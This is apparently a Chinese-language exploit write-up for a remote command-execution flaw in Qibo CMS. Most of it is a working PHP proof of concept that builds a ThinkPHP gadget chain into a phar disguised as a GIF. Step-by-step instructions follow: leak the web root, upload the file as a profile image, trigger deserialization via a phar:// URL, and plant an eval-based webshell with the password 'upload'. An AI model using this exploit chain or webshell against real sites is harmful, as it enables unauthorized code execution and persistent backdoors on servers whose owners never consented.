如果能贴出代码,跟一下就更好了
[齐博CMS 系统存在命令执行漏洞]
漏洞利用过程:
1 首先爆出网站根路径:
访问:
/index.php/cms/1
如果目标开启了 debug 模式,报错页面里会直接显示网站根路径;未开 debug 时看不到,需要另行确定。
然后根据得到的网站根路径修改 poc 中的 path(见 poc 里的注释)。
2 利用poc
生成 phar文件
poc
<?php
namespace think\process\pipes {
    // Stand-in for the framework's Windows pipes class; this is the entry point of
    // the gadget chain. Only the property the chain needs is declared.
    // NOTE(review): the code that consumes $files on destruction lives in the target
    // framework and is not shown in this listing — confirm the trigger path against
    // the exact ThinkPHP version shipped with the CMS.
    class Windows {
        private $files = [];

        // $files: per the author, must be an instance of a think\Model subclass
        // (new Pivot()); Model itself is abstract and cannot be instantiated directly.
        public function __construct($files)
        {
            $this->files = [$files];
        }
    }
}
namespace think {
    // Stand-in for think\Model. Only the properties the chain relies on are declared.
    // Visibility matters: protected/private properties get mangled names in the
    // serialized form, so they must be declared exactly as in the real class.
    abstract class Model{
        protected $append = [];
        protected $error = null;
        public $parent;

        // $output:        per the author, $this->parent must be a think\console\Output.
        // $modelRelation: per the author, $this->error must be a Relation subclass
        //                 that is also a OneToOne subclass, i.e. HasOne.
        function __construct($output, $modelRelation)
        {
            $this->parent = $output;
            // Per the author, "getError" is called by name via $append and hands back $this->error.
            $this->append = array("xxx"=>"getError");
            $this->error = $modelRelation;
        }
    }
}
namespace think\model{
    use think\Model;

    // Concrete Model subclass; needed only because Model is abstract. Adds no state
    // of its own, so the serialized payload carries exactly Model's properties.
    class Pivot extends Model{
        function __construct($output, $modelRelation)
        {
            parent::__construct($output, $modelRelation);
        }
    }
}
namespace think\model\relation{
    // Concrete OneToOne subclass; only the class name is needed, the state comes
    // from OneToOne.
    class HasOne extends OneToOne {
    }
}
namespace think\model\relation {
    // Stand-in for the framework's OneToOne relation; holds the Query the chain
    // pivots on plus the attribute name that becomes the second call argument.
    abstract class OneToOne
    {
        protected $selfRelation;
        protected $bindAttr = [];
        protected $query;

        // $query: per the author, a think\db\Query instance.
        function __construct($query)
        {
            $this->selfRelation = 0;
            $this->query = $query;
            // Per the author, this $value is passed as the second argument of the call.
            $this->bindAttr = ['xxx'];
        }
    }
}
namespace think\db {
    // Stand-in for think\db\Query; only $model is needed.
    class Query {
        protected $model;

        // $model: per the author, a think\console\Output instance (not a model).
        function __construct($model)
        {
            $this->model = $model;
        }
    }
}
namespace think\console{
    // Stand-in for think\console\Output. $styles names the method the chain wants
    // reached ('getAttr'); $handle is the next gadget.
    class Output{
        private $handle;
        protected $styles;

        // $handle: per the author, a think\session\driver\Memcached instance.
        function __construct($handle)
        {
            $this->styles = ['getAttr'];
            $this->handle =$handle;
        }
    }
}
namespace think\session\driver {
    // Stand-in for the Memcached session driver; only $handler is needed.
    class Memcached
    {
        protected $handler;

        // $handle: per the author, a think\cache\driver\File instance — the sink
        // that performs the actual file write.
        function __construct($handle)
        {
            $this->handler = $handle;
        }
    }
}
namespace think\cache\driver {
    // Stand-in for the File cache driver: the final sink of the chain. Its $options
    // decide where the write lands; 'path' is the only value that needs editing.
    class File
    {
        protected $options=null;
        protected $tag;

        function __construct(){
            $this->options=[
                'expire' => 3600,
                'cache_subdir' => false,
                'prefix' => '',
                //'path' => '1111.php',   // author's alternative plain path, kept as in the original
                // 'path' is a php://filter chain. The base64 segment after 'aaa' decodes to
                //   <?php @eval($_POST['upload']);echo("upload");?>
                // i.e. the webshell, with 'upload' as its POST parameter. The part after
                // resource= is the output file: '/phpstudy_pro/WWW/aaa/x1/' is the web root
                // found in step 1 and must be replaced per target; '/public/b.php' is where the
                // shell is written (the driver appends its own hash + '.php', see the final URL).
                // NOTE(review): the iconv/base64 filter pair and the 'aaa' prefix appear to
                // neutralise whatever the cache driver writes around the data — that code is
                // not shown here, confirm against the target version before relying on it.
                'path' => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWyd1cGxvYWQnXSk7ZWNobygidXBsb2FkIik7Pz4/../../../../../../../../../../../phpstudy_pro/WWW/aaa/x1/public/b.php', //win
                'data_compress' => false,
            ];
            $this->tag = 'xxx';
        }
    }
}
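namespace {
    // Assemble the gadget chain (innermost object first) and store it as the metadata
    // of a phar archive. The same object graph could be sent as urlencode(serialize($window))
    // wherever a plain unserialize() sink exists; here the phar route is used.
    //
    // Writing a phar requires phar.readonly=Off (PHP's default is On). Check up front so
    // a misconfigured generator fails with a clear message instead of an exception from
    // inside the Phar calls. ini_get() may return "1"/"0" or "On"/"Off", hence filter_var.
    if (filter_var(ini_get('phar.readonly'), FILTER_VALIDATE_BOOLEAN)) {
        fwrite(STDERR, "phar.readonly must be Off to write the archive, e.g. php -d phar.readonly=0 poc.php\n");
        exit(1);
    }

    $Memcached = new think\session\driver\Memcached(new \think\cache\driver\File());
    $Output = new think\console\Output($Memcached);
    $model = new think\db\Query($Output);
    $HasOne = new think\model\relation\HasOne($model);
    $window = new think\process\pipes\Windows(new think\model\Pivot($Output, $HasOne));

    // Per the author, the extension must be .phar or the Phar constructor refuses it.
    // The file is renamed to .gif afterwards; the stub's GIF89a magic keeps it looking
    // like an image to naive upload checks.
    $filename = '2.phar';
    if (file_exists($filename)) {
        unlink($filename);
    }

    $phar = new Phar($filename);
    $phar->startBuffering();
    $phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>");
    $phar->setMetadata($window); // metadata is unserialized when the archive is opened via phar://
    $phar->addFromString("foo.txt", "bar");
    $phar->stopBuffering();
}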
3 运行 poc 生成 phar 文件,并将后缀改成 gif(文件头 GIF89a 已由 stub 提供)。
4 访问会员中心,点击修改个人资料,上传改名后的 gif 文件,并用 burp 抓取返回的文件上传路径:
5 再访问下面的 url,通过 phar:// 协议加载刚上传的文件,写入 webshell:
/index.php/index/Image/headers?url=phar://./public/uploads/pop/20210915/2_20210915195309ac45c.gif
url 参数中的路径就是刚刚上传的 gif 文件的路径。
访问完成后,即可在网站目录下生成 webshell。
6 访问webshell
/public/b.php12ac95f1498ce51d2d96a249c09c1998.php
shell 写入成功,连接密码是 upload(对应 poc 中 base64 解码后的 $_POST['upload'])。
总结
一直挖洞一直爽!